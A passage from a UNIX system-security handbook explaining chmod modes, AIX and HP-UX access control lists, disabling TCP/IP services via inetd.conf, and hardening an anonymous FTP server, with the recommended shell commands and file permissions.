subdirectories, the process is repeated.<br />

If the -f option is specified for versions that support it, chmod does not report any errors encountered. This processing is<br />

sometimes useful in shell scripts if you don't know whether the filelist exists or not and if you don't want to generate an error<br />

message.<br />

The -h option is specified in some systems to change how chmod works with symbolic links. If the -h option is specified and one<br />

of the arguments is a symbolic link, the permissions of the file or directory pointed to by the link are not changed.<br />

The symbolic form of the chmod command is useful if you only want to add or remove a specific privilege from a file. For<br />

example, if Sian wanted to give everybody in her group write permission to the file notes, she could issue the command:<br />

% ls -l notes
-rw-r--r--  1 sian     biochem     4320 Feb  9 13:20 notes
% chmod g+w notes
% ls -l notes
-rw-rw-r--  1 sian     biochem     4320 Feb  9 13:20 notes
%



To change this file further so people who aren't in her group can't read it, she could use the command:<br />

% chmod o-r notes<br />

% ls -l notes<br />

-rw-rw---- 1 sian biochem 4320 Feb 9 13:20 notes<br />

%<br />

To change the permissions of the invoice file so nobody else on the system can read or write it, Sian could use the command:<br />

% chmod go= invoice<br />

% ls -l invoice<br />

-rw------- 1 sian user 4320 Feb 9 13:20 invoice<br />

% date<br />

Sun Feb 10 00:32:55 EST 1991<br />

%<br />

Notice that changing a file's permissions does not change its modification time (although it will alter the inode's ctime).<br />

5.2.2 Changing a File's Permissions<br />

You can also use the chmod command to set a file's permissions, without regard to the settings that existed before the command<br />

was executed. This format is called the absolute form of the chmod command.<br />

The absolute form of chmod has the syntax:<br />

% chmod [-Rfh] mode filelist<br />

where the options have the following meanings:

-R        As described earlier
-f        As described earlier
-h        As described earlier
mode      The mode to which you wish to set the file, expressed as an octal[15] value
filelist  The list of the files whose modes you wish to set

[15] Octal means "base 8." Normally, we use base 10, which uses the digits 0, 1, 2, 3, 4, 5, 6, 7, 8, and 9. The octal system uses the digits 0, 1, 2, 3, 4, 5, 6, and 7. If you are confused, don't be: for most purposes, you can pretend that the numbers are in decimal notation and never know the difference.

To use this form of the chmod command, you must calculate the octal value of the file permissions that you want. The next<br />

section describes how to do this.<br />

5.2.3 Calculating Octal File Permissions<br />

chmod allows you to specify a file's permissions with a four-digit octal number. You calculate the number by adding[16] the<br />

permissions. Use Table 5.8 to determine the octal number that corresponds to each file permission.<br />

[16] Technically, we are ORing the values together, but as there is no carry, it's the same as adding.<br />

Table 5.8: Octal Numbers and Permissions<br />

Octal Number Permission<br />


4000 Set user ID on execution (SUID)<br />

2000 Set group ID on execution (SGID)<br />

1000 "Sticky bit"<br />

0400 Read by owner<br />

0200 Write by owner<br />

0100 Execute by owner<br />

0040 Read by group<br />

0020 Write by group<br />

0010 Execute by group<br />

0004 Read by other<br />

0002 Write by other<br />

0001 Execute by other<br />

Thus, a file with the permissions "-rwxr-x---" has a mode of 0750, calculated as follows:<br />

0400   Read by owner
0200   Write by owner
0100   Execute by owner
0040   Read by group
0010   Execute by group
----
0750   Result

Table 5.9 contains some common file permissions and their uses.<br />

Table 5.9: Common File Permissions

Octal Number   File                                   Permission
0755           /bin/ls                                Anybody can copy or run the program; the file's owner can modify it.
0711           $HOME                                  Locks a user's home directory so that no other users on the system can display its contents, but allows other users to access files or subdirectories contained within the directory if they know the names of the files or directories.
0700           $HOME                                  Locks a user's home directory so that no other users on the system can access its contents, or the contents of any subdirectory.
0600           /usr/mail/$USER and other mailboxes    The user can read or write the contents of the mailbox, but no other users (except the superuser) may access it.
0644           any file                               The file's owner can read or modify the file; everybody else can only read it.
0664           groupfile                              The file's owner or anybody in the group can modify the file; everybody else can only read it.
0666           writable                               Anybody can read or modify the file.
0444           readable                               Anybody can read the file; only the superuser can modify it without changing the permissions.

5.2.4 Using Octal File Permissions<br />

After you have calculated the octal file permission that you want, you can use the chmod command to set the permissions of files<br />

you own.<br />

For example, to make all of the C language source files in a directory writable by the owner and readable by everybody else,<br />

type the command:<br />

% chmod 644 *.c<br />


% ls -l *.c<br />

-rw-r--r-- 1 kevin okisrc 28092 Aug 9 9:52 cdrom.c<br />

-rw-r--r-- 1 kevin okisrc 5496 Aug 9 9:52 cfs_subr.c<br />

-rw-r--r-- 1 kevin okisrc 5752 Aug 9 9:52 cfs_vfsops.c<br />

-rw-r--r-- 1 kevin okisrc 11998 Aug 9 9:53 cfs_vnodeops.c<br />

-rw-r--r-- 1 kevin okisrc 3031 Aug 9 9:53 load_unld.c<br />

-rw-r--r-- 1 kevin okisrc 1928 Aug 9 9:54 Unix_rw.c<br />

-rw-r--r-- 1 kevin okisrc 153 Aug 9 9:54 vers.c<br />

%<br />

To change the permissions of a file so it can be read or modified by anybody in your group, but can't be read or written by<br />

anybody else in the system, type the command:<br />

% chmod 660 memberlist<br />

% ls -l memberlist<br />

-rw-rw---- 1 kevin okisrc 153 Aug 10 8:32 memberlist<br />

%<br />

5.2.5 Access Control Lists[17]<br />

[17] This section is largely based on Æleen Frisch's Essential System Administration, Second Edition (O'Reilly & Associates, 1995), Chapter 6, and is used here with permission.

Some versions of UNIX support Access Control Lists, or ACLs. These are normally provided as an extension to standard UNIX file permission modes. With ACLs, you can specify additional access rights to each file and directory for many individual users rather than lumping them all into the category "other." You can also set different permissions for members of different groups. We think they are a wonderful feature, and something we will see more of in future years. Unfortunately, every vendor has implemented them differently, and this makes describing them somewhat complex.

ACLs offer a further refinement to the standard UNIX file permissions capabilities. ACLs enable you to specify file access for completely arbitrary subsets of users and/or groups. Both AIX and HP-UX provide access control lists. Solaris and Linux are supposed to have them in future releases. Also, the Open Software Foundation's Distributed Computing Environment has a form of ACLs.

For many purposes, ACLs are superior to the UNIX group mechanism for small collaborative projects. If Hana wants to give Miria - and only Miria - access to a particular file, Hana can modify the file's ACL to give Miria access. Without ACLs, Hana would have to go to the system administrator, have a new group created that contains both Hana and Miria (and only Hana and Miria) as group members, and then change the group of the file to the newly created group.

NOTE: Because ACLs are not standard across UNIX versions, you should not expect them to work in a network filesystem environment. In particular, Sun plans to support ACLs through the use of private extensions to the NFS3 filesystem, rather than building ACLs into the specification. Therefore, be sure that anything you export via NFS is adequately protected by the default UNIX file permissions and ownership settings.

5.2.5.1 AIX Access Control Lists<br />

An AIX ACL contains these fields (the text in italics to the right describes the line contents):<br />

attributes:                            Special modes like SUID.
base permissions                       Normal UNIX file modes:
    owner(chavez):  rw-                User access.
    group(chem):    rw-                Group access.
    others:         r--                Other access.
extended permissions                   More specific permissions entries:
    enabled                            Whether they're used or not.
    specify  r--  u:harvey             Permissions for user harvey.
    deny     -w-  g:organic            Permissions for group organic.
    permit   rw-  u:hill, g:bio        Permissions for user hill when in group bio.

The first line specifies any special attributes on the file (or directory). The possible attribute keywords are SETUID, SETGID,<br />

and SVTX (sticky bit is set). Multiple attributes are all placed on one line, separated by commas.<br />

The next section of the ACL lists the base permissions for the file or directory. These correspond exactly to the <strong>UNIX</strong> file<br />

modes. Thus, for the file we're looking at, the owner (who is chavez) has read and write access, members of the group chem

(which is the group owner of the file) also have read and write access, and all others have read access.<br />

The final section specifies extended permissions for the file: access information specified by user and group name. The first line<br />

in this section is either the word enabled or disabled, indicating whether the extended permissions that follow are actually used<br />

to determine file access or not. In our example, extended permissions are in use.<br />

The rest of the lines in the ACL are access control entries (ACEs), which have the following format:

operation access-types user-and-group-info<br />

where the operation is one of the keywords permit, deny, or specify, which correspond to chmod's +, -, and = operators,<br />

respectively. permit adds the specified permissions to the ones the user already has, based on the base permissions; deny takes<br />

away the specified access; and specify sets the access for the user to the listed value. The access-types are the same as those for<br />

normal <strong>UNIX</strong> file modes. The user-and-group-info consists of a user name (preceded by u:) or one or more group names (each<br />

preceded by g:) or both. Multiple items are separated by commas.<br />

Let's look again at the ACEs in our sample ACL:

specify r-- u:harvey<br />

deny r-- g:organic<br />

permit rw- u:hill, g:bio<br />

The first line grants read-only access to user harvey on this file. The second line removes read access for the organic group from<br />

whatever permissions a user in that group already has. The final line adds read and write access to user hill while group bio is<br />

part of the current group set. By default, the current group set is all of the groups to which the user belongs.<br />

ACL entries that specify a username and group are useful mostly for accounting purposes; the ACL shown earlier ensures that user hill

has group bio active when working with this file. They are also useful if you add a user to a group on a temporary basis, ensuring<br />

that the added file access goes away if the user is later removed from the group. In the previous example, user hill would no<br />

longer have access to the file if she were removed from the bio group (unless, of course, the file's base permissions grant it to<br />

her).<br />

If more than one item is included in the user-and-group-info, then all of the items must be true for the entry to be applied to a<br />

process (AND logic). For example, the first ACE below is applied only to users who "have both bio and chem in their group<br />

sets" (which is often equivalent to "are members of both the chem and bio groups"):<br />

permit rw- g:chem, g:bio<br />

permit rw- u:hill, g:chem, g:bio<br />

The second ACE applies to user hill only when both groups are in the current group set. If you wanted to grant write access to<br />

anyone who was a member of either group chem or group bio, you would specify two separate entries:<br />

permit rw- g:chem<br />

permit rw- g:bio<br />

At this point, you might wonder what happens when more than one entry applies. When a process requests access to a file with<br />

extended permissions, the permitted accesses from the base permissions and all applicable ACEs - all ACEs which match the user and group identity of the process - are combined via a union operation. The denied accesses from the base permissions and all applicable ACEs are also combined. If the requested access is permitted and it is not denied, then it is granted. Thus, contradictions among ACEs are resolved in the most conservative way: access is denied unless it is both permitted and not

denied.<br />

For example, consider the ACL below:<br />

attributes:
base permissions
    owner(chavez):  rw-
    group(chem):    r--
    others:         ---
extended permissions
    enabled
    specify  r--  u:stein
    permit   rw-  g:organic, g:bio
    deny     rwx  g:physics

Now suppose that the user stein, who is a member of both the organic and bio groups (and not a member of the chem group),<br />

wants write access to this file. The base permissions clearly grant stein no access at all to the file. The ACEs in lines one and two of the extended permissions apply to stein. These ACEs grant him read access (lines one and two) and write access (line two). They also deny him write and execute access (implicit in line one). Thus, stein will not be given write access because while the combined ACEs do grant it to him, they also deny write access, and so the request will fail.

NOTE: The base permissions on a file with an extended access control list may be changed with chmod's symbolic<br />

mode, and any changes made in this way will be reflected in the base permissions section of the ACL. However,<br />

chmod's numeric mode must not be used for files with extended permissions, because using it automatically<br />

disables them.<br />

ACLs may be applied and modified with the acledit command. acledit retrieves the current ACL for the file specified as its

argument and opens it for editing, using the text editor specified by the EDITOR environment variable. The use of this variable<br />

under AIX is different from its use in other <strong>UNIX</strong> systems.[18] For one thing, no default exists (most <strong>UNIX</strong> implementations<br />

use vi when EDITOR is unset). For another, AIX requires that the full pathname to the editor be supplied, rather than only the<br />

filename.[19]<br />

[18] As are many things in AIX.<br />

[19] E.g., /bin/vi, not vi.<br />

Once in the editor, make any changes to the ACL that you wish. If you are adding extended permission ACES, be sure to change<br />

disabled to enabled in the first line of that section. When you are finished, exit from the editor normally. AIX will then print the<br />

message:<br />

Should the modified ACL be applied? (y)<br />

If you wish to discard your changes to the ACL, enter "n"; otherwise, you should enter a carriage return. AIX will then check the<br />

new ACL, and if it has no errors, apply it to the file. If there are errors in the ACL (misspelled keywords or usernames are the<br />

most common), you will be placed back in the editor where you can correct the errors and try again. AIX will put error messages<br />

like the following example at the bottom of the file, describing the errors it found:<br />

* line number 9: unknown keyword: spceify<br />

* line number 10: unknown user: chavze<br />

You don't need to delete the error messages themselves from the ACL.<br />

However, this is the slow way of applying an ACL. The aclget and aclput commands offer alternative ways to display and apply<br />

ACLs to files.

aclget takes a filename as its argument, and displays the corresponding ACL on standard output (or to the file specified in its -o<br />

option).<br />

The aclput command is used to read an ACL from a text file. By default, it takes its input from standard input, or from an input<br />

file specified with the -i option. Thus, to set the ACL for the file gold to the one stored in the file metal.acl, you could use this<br />

command:<br />

$ aclput -i metal.acl gold<br />

This form of aclput is useful if you use only a few different ACLs, all of which are saved as separate files to be applied as

needed.<br />

To copy an ACL from one file to another, put aclget and aclput together in a pipe. For example, the command below copies the<br />

ACL from the file silver to the file emerald:<br />

$ aclget silver | aclput emerald<br />


To copy an ACL from one file to a group of files, use xargs:<br />

$ ls *.dat *.old | xargs -i /bin/sh -c "aclget silver | aclput {}"<br />

These commands copy the ACL in silver to all the files ending in .dat and .old in the current directory.<br />

You can use the ls -le command to quickly determine whether a file has an extended permissions set or not:<br />

$ ls -le *_acl<br />

-rw-r-----+ 1 chavez chem 51 Mar 20 13:27 has_acl<br />

-rwxrws---- 2 chavez chem 512 Feb 08 17:58 no_acl<br />

The plus sign appended to the normal mode string indicates the presence of extended permissions; the minus sign is present<br />

otherwise.<br />

5.2.5.2 HP-UX access control lists<br />

The lsacl command can be used to view the access control list for a file. For a file having only normal <strong>UNIX</strong> file modes set, the<br />

output looks like this:<br />

(chavez.%,rw-)(%.chem,r--)(%.%,---) bronze<br />

This example shows the format an ACL takes under HP-UX. Each parenthesized item is known as an access control list entry,<br />

although we're going to call them "entries." The percent sign character ("%") is a wildcard within an entry, and the three entries<br />

in the previous listing specify the access for user chavez as a member of any group, for any user in group chem, and for all other<br />

users and groups, respectively.<br />

A file can have up to 16 access control list entries: three base entries corresponding to normal file modes and up to 13 optional<br />

entries. Here is the access control list for another file (generated this time by lsacl -l):<br />

silver:<br />

rwx chavez.%<br />

r-x %.chem<br />

r-x %.phys<br />

r-x hill.bio<br />

rwx harvey.%<br />

--- %.%<br />

This ACL grants every access to user chavez with any current group membership (she is the file owner). It grants read and<br />

execute access to members of the chem and phys groups; it grants read and execute access to user hill, if hill is a member of<br />

group bio; it grants user harvey read, write, and execute access regardless of his group membership; and it grants no access to<br />

any other user or group.<br />

Entries within an HP-UX access control list are examined in order of decreasing specificity: entries with a specific user and<br />

group are considered first; those with only a specific user follow; ones with only a specific group are next; and the other entries<br />

are last of all. Within a class, entries are examined in order. When determining whether or not to permit file access, the first<br />

applicable entry is used. Thus, user harvey will be given write access to the file silver even if he is a member of the chem or phys<br />

group.<br />

The chacl command is used to modify the access control list for a file. ACLs can be specified to chacl in two distinct forms: as a

list of entries or via a chmod-like syntax. By default, chacl adds entries to the current ACL. For example, these two commands<br />

add to the file silver's ACL read access for the bio group and read and execute access for user hill:

$ chacl "(%.bio,r--) (hill.%,r-x)" silver<br />

$ chacl "%.bio = r, hill.% = rx" silver<br />

In either format, the access control list must be passed to chacl as a single argument. The second format also includes + and -<br />

operators as in chmod. For example, this command adds read access for group chem and user harvey, and removes write access<br />

for group chem, adding or modifying ACL entries as needed:<br />

$ chacl "%.chem -w+r, harvey.% +r" silver<br />

chacl's -r option can be used to replace the current ACL:<br />

$ chacl -r "@.% = 7, %.@ = rx, %.bio = r, %.% = " *.dat<br />


The @ sign is a shorthand for the current user or group owner as appropriate, and also enables user-independent ACLs to be

constructed. chacl's -f option can be used to copy an ACL from one file to another file or group of files. This command applies<br />

the ACL from the file silver to all files in the current directory having the extension .dat :<br />

$ chacl -f silver *.dat<br />

Be careful with this option as it will change the ownership of target files if necessary so that the ACL exactly matches that of the<br />

specified file. If you merely want to apply a standard ACL to a set of files, you're better off creating a file containing the desired<br />

ACL, using @ characters as appropriate, and then applying it to files in this way:<br />

$ chacl -r `cat acl.metal` *.dat<br />

You can create the initial template file by using lsacl on an existing file and capturing the output.<br />
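For example, assuming the single-line lsacl output format shown earlier (entries followed by the filename), one way to build such a template is to strip the trailing filename from the listing; the sed expression here is only one approach:

$ lsacl bronze | sed 's/ [^ ]*$//' > acl.metal

The resulting acl.metal file can then be applied to other files with the chacl -r command shown above.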

You can still use chmod to change the base entries of a file with an ACL if you include the -A option. Files with optional entries<br />

are marked by a plus sign appended to the mode string in long directory listings:<br />

-rw-------+ 1 chavez chem 8684 Jun 20 16:08 has_one<br />

-rw-r--r-- 1 chavez chem 648205 Jun 20 11:12 none_here<br />




Chapter 17<br />

TCP/IP Services<br />

17.3 Primary <strong>UNIX</strong> Network Services<br />

This section describes selected network services that are usually provided as part of the standard <strong>UNIX</strong> network package. It<br />

further discusses some of the major security implications of each of these services.<br />

Every network service carries both known and unknown security risks. Some services have relatively small known risks, while<br />

others have substantial ones. And with every network service there is the possibility that a security flaw in the protocol or the<br />

server will be discovered at some point in the future. Thus, a conservative security policy would remove every service for which<br />

there is no demonstrated need.<br />

If you think that the risk of a service outweighs its benefit, then you can disable the service simply by placing a hash mark (#) at<br />

the beginning of the lines in the /etc/rc* file(s) or the /etc/inetd.conf file that cause the server program to be executed. This will<br />

serve to comment out those lines. Of course, if you turn off a needed service, people who wish to use it are likely to complain!<br />

Remember, too, that disabling the ability to receive network connections does not prevent people on your computer from initiating<br />

outbound network connections.<br />

Note that the inetd program may not take notice of any changes to its configuration until it is restarted or sent a signal (usually the<br />

HUP signal; consult the inetd man page for your system). Changes in the /etc/rc* file(s) may not take effect until you change the<br />

run level or restart your system. Thus, if you disable a service, the change may not cause a currently running invocation of the<br />

server to terminate - you may need to take some other action before you can verify that you have properly disabled the service.<br />
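For example, to turn off a service managed by inetd, you would comment out its line in /etc/inetd.conf and then signal the daemon. The systat line and the location of inetd's process ID file shown below are illustrative; the exact fields and paths vary from system to system, so check your own configuration file and manual pages:

#systat  stream  tcp  nowait  nobody  /usr/bin/who  who

After saving the file, send inetd the HUP signal so that it rereads its configuration:

# kill -HUP `cat /var/run/inetd.pid`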

We recommend that you save a copy of any configuration files before you begin to edit them. That way, if you make a mistake or<br />

if something doesn't work as expected, you can roll back to an earlier version of the files to determine what happened. You might<br />

consider using the RCS or SCCS revision-control systems to manage these files. These systems allow you to put date stamps and<br />

comments on each set of changes, for future reference. Such markings may also be useful for comparison purposes if you believe<br />

that the files have been changed by an intruder, although this isn't a particularly strong form of detection.<br />
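With RCS, for instance, checking a configuration file in before and after each edit records who changed what and when. The commands below are ordinary RCS usage, shown here applied to /etc/inetd.conf as an example:

# cd /etc
# ci -l inetd.conf        Check the file in, keeping a locked, writable working copy.
  ...edit the file...
# ci -l inetd.conf        Check in the new revision; RCS prompts for a log message.
# rcsdiff inetd.conf      Compare the working file against the last checked-in revision.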

17.3.1 systat (TCP Port 11)<br />

The systat service is designed to provide status information about your computer to other computers on the network.<br />

Many sites have configured their /etc/inetd.conf file so that connections to TCP port 11 are answered with the output of the who or

w command. You can verify if your system is configured in this manner with the telnet command:<br />

unix% telnet media.mit.edu 11<br />

Trying 18.85.0.2... Connected to media.mit.edu.<br />

Escape character is '^]'.<br />

lieber ttyp0 Aug 12 19:01 (liebernardo.medi)<br />

cahn ttyp1 Aug 13 14:47 (remedios:0.0)<br />

foner ttyp2 Aug 11 16:25 (18.85.3.35:0.2)<br />

jrs ttyp3 Aug 13 17:12 (pu.media.mit.edu)<br />

ereidell ttyp4 Aug 14 08:47 (ISAAC.MIT.EDU)<br />

felice ttyp5 Aug 14 09:40 (gaudy.media.mit.)<br />

das ttyp6 Aug 10 19:00 (18.85.4.207:0.0)<br />

...<br />

Although providing this information is certainly a friendly thing to do, usernames, login times, and origination hosts can be used<br />

to target specific attacks against your system. We therefore recommend against running this service.<br />

To disable the service, simply comment or remove the line beginning with the word "systat" from your /etc/inetd.conf file. You can


also verify that the service has been disabled by using the telnet command:<br />

unix% telnet media.mit.edu 11<br />

Trying 18.85.0.2... Connection refused.<br />

unix%<br />

17.3.2 (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

The File Transfer Protocol (FTP) allows you to transfer complete files between systems. Its <strong>UNIX</strong> implementation consists of two<br />

programs: ftp is the client program; /etc/ftpd (sometimes called /usr/etc/in.ftpd) is the server. TCP port 21 is used for sending<br />

commands; port 20 is occasionally used for the data stream, although it is more common for the client and server to mutually<br />

negotiate a set of port numbers greater than 1024.<br />

When you use FTP to contact a remote machine, the remote computer requires that you log in by providing your username and<br />

password; FTP logins are usually recorded on the remote machine in the /usr/adm/wtmp file. Because the passwords typed to FTP<br />

are transmitted unencrypted over the network, they can be intercepted (as with the telnet and rexec commands); for this reason,<br />

some sites may wish to disable the ftp and ftpd programs, or modify them to use alternative authentication protocols.<br />

17.3.2.1 Using anonymous FTP<br />

FTP can be set up for anonymous access, which allows people on the network who do not have an account on your machine to<br />

deposit or retrieve files from a special directory. Many institutions use anonymous FTP as a low-cost method to distribute<br />

software and databases to the public.<br />

To use anonymous FTP, simply specify ftp [6] as your username, and your real identity - your email address - as the password.<br />

[6] Some older servers require that you specify "anonymous" for anonymous FTP; most servers accept either<br />

username.<br />

% ftp athena-dist.mit.edu<br />

Connected to AENEAS.MIT.EDU.<br />

220 aeneas FTP server (Version 4.136 Mon Oct 31 23:18:38 EST 1988) ready.<br />

Name (athena-dist.mit.edu:fred): ftp<br />

331 Guest login ok, send ident as password.<br />

password: Rachel@ora.com<br />

230 Guest login ok, access restrictions apply.<br />

ftp><br />

Increasingly, systems on the <strong>Internet</strong> require that you specify an email address as your "password." However, few of these systems<br />

verify that the email address you type is your actual email address.<br />

17.3.2.2 Passive vs. active FTP<br />

The FTP protocol supports two modes of operation, active (often called normal) and passive. These modes determine whether the

FTP server or the client initiates the TCP connections that are used to send information from the server to the host.<br />

Active mode is the default. In active mode, the server opens a connection to the client, as illustrated in Figure 17.1. Active mode<br />

complicates the construction of firewalls, because the firewall must anticipate the connection from the FTP server back to the FTP<br />

client program and permit that connection through the firewall.<br />

Figure 17.1: Active-mode FTP connection<br />


Figure 17.2: Passive-mode FTP connection<br />

17.3.2.3 FTP passive mode<br />

Under normal circumstances, the FTP server initiates the data connection back to the FTP client. Many FTP servers and clients<br />

support an alternative mode of operation called passive mode. In passive mode, the FTP client initiates the connection that the<br />

server uses to send data back to client. Passive mode is shown in Figure 17.2. Passive mode is desirable, because it simplifies the<br />


task of building a firewall: the firewall simply allows internal connections to pass through to the outside world, but it does not<br />

need to allow outside connections to come back in. Not all FTP clients support passive mode, but many do, including the FTP<br />

clients that are built in to most popular WWW browsers. If your software does not yet include it, you should upgrade to software<br />

that does.<br />

17.3.2.4 Setting up an FTP server<br />

If you wish to provide FTP service, you have three choices for FTP servers:<br />

1. You can use the standard UNIX ftpd that comes with your system. Depending on your UNIX vendor, this version may or may not be secure and bug free. Over the years, many security problems have been found with ftpd. Some vendors have been quick to implement the necessary bug fixes; others have not.

2. You can run wuftpd, an excellent FTP server originally written at Washington University in Saint Louis. The wuftpd server has many useful options that allow you to create different categories of FTP users, allow you to set limits on the number of simultaneous file transfers, and allow you to save network bandwidth by automatically compressing and archiving files as they are transferred. Unfortunately, the program itself is quite complex, is somewhat difficult to configure, and has had security problems in the past. Nevertheless, wuftpd is the FTP server of choice for many major archive sites.

3. If you only want to provide anonymous FTP access, you can use one of several stripped-down, minimal implementations of FTP servers. One such version is the aftpd server, written by Marcus Ranum when he was at Trusted Information Systems. The aftp server is designed to be as simple as possible so as to minimize potential security problems; therefore, it has far fewer features and options than other servers. In particular, it will only serve files in anonymous transfer mode. We suggest that you consider getting a copy of aftp (or something like it) if you only want to offer anonymous access.[7]

   [7] This is not the same FTP server as the one included in the TIS Firewall Toolkit. aftp is available from the TIS FTP site, ftp.tis.com.

All of these servers are started by the inetd daemon, and thus require an entry in the /etc/inetd.conf file. You can either have the

FTP server run directly or run through a wrapper such as tcpwrapper. Our discussion of FTP services in the following sections<br />

applies to the standard <strong>UNIX</strong> ftpd server.<br />

17.3.2.5 Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

The /etc/ftpusers file contains a list of the accounts that are not allowed to use FTP to transfer files. This file should contain all<br />

accounts that do not belong to actual human beings:<br />

# cat /etc/ftpusers<br />

root<br />

uucp<br />

news<br />

bin<br />

ingres<br />

nobody<br />

daemon<br />

In this example, we specifically block access to the root, uucp, news, bin, and other accounts so that attackers on the <strong>Internet</strong> will<br />

not be able to break into these accounts using the FTP program. Blocking system accounts in this manner also prevents the system<br />

manager from transferring files to these accounts using FTP, which is a risk because the passwords can be intercepted with a<br />

packet sniffer.<br />

Additionally, most versions of FTP will not allow a user to transfer files if the account's shell, as given in the /etc/passwd file of<br />

the system, is not also listed in the /etc/shells[8] file. This is to prevent users who have had accounts disabled, or who are using<br />

restricted shells, from using FTP. You should test this feature with your own server to determine if it works correctly.<br />

[8] Note that /etc/shells is also used by chfn as a list of allowable shells to change to.<br />

17.3.2.6 Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

Setting up anonymous FTP on a server is relatively easy, but you must do it correctly, because you are potentially giving access to<br />

your system to everybody on the network.<br />



To set up anonymous FTP, you must create a special account with the name ftp. For example:<br />

ftp:*:400:400:Anonymous FTP:/var/spool/ftp:/bin/false<br />

Files that are available by anonymous FTP will be placed in the ftp home directory; you should therefore put the directory in a<br />

special place, such as /var/spool/ftp.<br />

When it is used for anonymous FTP, ftpd uses the chroot() function call to change the root of the perceived filesystem to the home<br />

directory of the ftp account. For this reason, you must set up that account's home directory as a mini filesystem. Three directories<br />

go into this mini filesystem:<br />

bin
    This directory holds a copy of the /bin/ls program, which ftpd uses to list files. If your system uses dynamic linking and shared libraries, you must either install programs that are statically linked or install the dynamic libraries in the appropriate directory (for example, /var/spool/ftp/lib).

etc
    This directory holds a version of the /etc/passwd and /etc/group files, which are put there so the /bin/ls command will print usernames and groupnames when it lists files. Replace the encrypted passwords in this file with asterisks. Some security-conscious sites may wish to delete some or all account names from the passwd file; the only one that needs to be present is ftp. (Actually, if neither file exists, most FTP servers will still work normally.)

pub
    This directory, short for public, holds the files that are actually made available for anonymous FTP transfer. You can have as many subdirectories as you wish in the pub directory.

Be sure to place the actual files in these directories, rather than using symbolic links pointing to other places on your system.<br />

Because the ftpd program uses the chroot() system call, symbolic links may not behave properly with anonymous FTP. In general,

symbolic links to inside your chroot area will work, and they are commonly used on anonymous FTP sites. However, any<br />

symbolic link which points outside the chroot area or is an absolute symbolic link will not work.<br />

Now execute the following commands as the superuser. We assume that you've already created ~ftp.<br />

# mkdir ~ftp/bin ~ftp/etc ~ftp/pub Create needed directories.<br />

Set up ~ftp/bin:<br />

# cp /bin/ls ~ftp/bin              Make a copy of the ls program.
# chown root ~ftp/bin/ls           Make sure root owns the copy of ls.
# chmod 111 ~ftp/bin/ls            Make sure ls can't be changed.
# chmod 111 ~ftp/bin               Make directory execute only.
# chown root ~ftp/bin              Make sure root owns the directory.

Set up ~ftp/etc:<br />

# cat /etc/passwd | awk -F: '{printf "%s:*:%s:%s::\n",$1,$3,$4}' \
  > ~ftp/etc/passwd                Make a copy of /etc/passwd with
                                   all passwords changed to asterisks.
# awk -F: '{printf "%s::%s:%s\n",$1,$3,$4}' /etc/group > ~ftp/etc/group
                                   Make a copy of /etc/group.

# chmod 444 ~ftp/etc/* Make sure files in etc are not writable.<br />

# chmod 111 ~ftp/etc Make directory execute-only.<br />

# chown root ~ftp/etc Make sure root owns the directory.<br />

Alternatively, note that most ftp servers will work fine if the only entries in the passwd file are for root and ftp, and the only entry<br />

in the group file is for group ftp. The only side-effect is that files left in the ftp directories will show numeric owner and groups<br />

when clients do a directory listing. The advantage to having a trimmed file is that outsiders cannot gain any clues as to your<br />


system's user population if they should obtain a copy of the file.<br />
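For example, a trimmed ~ftp/etc/passwd and ~ftp/etc/group might contain nothing more than the entries below; the uid and gid of 400 simply match the sample ftp account shown earlier in this section:

# cat ~ftp/etc/passwd
root:*:0:0:::
ftp:*:400:400:Anonymous FTP:/var/spool/ftp:/bin/false
# cat ~ftp/etc/group
ftp:*:400: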

Some systems will require you to install dynamic libraries and even device files to make the FTP server's file list command work.<br />

This is particularly a problem on Solaris systems. In general, the fewer files accessed in the anonymous FTP area, the harder the<br />

system will be to compromise.<br />

Set up ~ftp/pub:<br />

# chown root.wheel ~ftp/pub Make sure root owns the directory.<br />

# chmod 555 ~ftp/pub Make directory writable by nobody.[9]<br />

(See warning.)<br />

And finally, secure the ~ftp directory:<br />

# chmod 555 ~ftp<br />

# chown root ~ftp<br />

NOTE: Note that some man pages from some vendors state that the ~ftp directory should be owned by user ftp. This<br />

practice is dangerous! If user ftp owns the home directory, anonymous users can change the FTP environment, can<br />

delete or create new files at will, and can run any program that they choose. They can also create .rhosts files to gain<br />

direct access to your system!<br />

You should also set up a mail alias for the ftp user, so that mail sent to ftp is delivered to one of your system administrators.<br />

Don't Become an FTP-Software Pirate Repository!<br />

Years ago, organizations that ran FTP servers would routinely create an "open" directory on their servers so that users on the<br />

network could leave files for users of the system. Unfortunately, software pirates soon started using those directories as<br />

repositories for illegally copied programs, files of stolen passwords, and pornographic pictures. Collectively, this information is<br />

sometimes known as warez, although that name is usually reserved for the pirated software alone. Today, if you have a directory<br />

on an anonymous FTP server that is writable by the FTP user, the odds are quite high that it eventually will be discovered and<br />

used in this manner.<br />

Of course, some sites still wish to create "depository" directories on their FTP servers, so that users on the network can leave files<br />

for users of their system. The correct way to do so is to create a depository that is carefully controlled and automatically emptied:<br />

1. Create a directory that is writable, but not readable, by the ftp user. The easiest way to do so is to make the directory owned by root, and give it a mode of 1733. In this manner, files can be left for users, but other users who connect to your system using anonymous FTP will not be able to list the content of the directory.[10]

   [10] If you are using the wu archive server, you can configure it so that uploaded files are uploaded in mode 004, so that they cannot be read by another client. If you are writing your own server, this is a good idea to include in your code.

2. Put a file quota on the ftp user, to limit the total number of bytes that can be received. (Alternatively, locate the anonymous FTP directory on an isolated partition.)

3. Create a shell script that automatically moves any files left in the depository that are more than 15 (or 30 or 60) minutes old into another directory that is not accessible by the anonymous FTP user (see the sketch after this list). You may also wish to have your program send you email when files are received.

4. Place an entry in your /usr/lib/crontab file so this script runs automatically every 15-30 minutes.
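Here is one sketch of such an arrangement. The directory names, the timestamp-file trick (used instead of relying on a particular version of find), and the 15-minute interval are all illustrative choices:

#!/bin/sh
# sweep-drop: move files left in the anonymous FTP depository into a
# directory that the ftp user cannot reach.
DROP=/var/spool/ftp/incoming
HOLD=/var/spool/ftp-hold
STAMP=$HOLD/.last-sweep

# Anything not newer than the previous run's timestamp has been sitting in
# the depository for at least one full interval; move it out.
if [ -f "$STAMP" ]
then
        find "$DROP" -type f ! -newer "$STAMP" -print |
        while read file
        do
                /bin/mv "$file" "$HOLD"
        done
fi
touch "$STAMP"

A crontab entry runs the script every 15 minutes (crontab formats vary slightly from system to system):

0,15,30,45 * * * * /usr/local/etc/sweep-drop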

17.3.2.7 Allowing only FTP access<br />

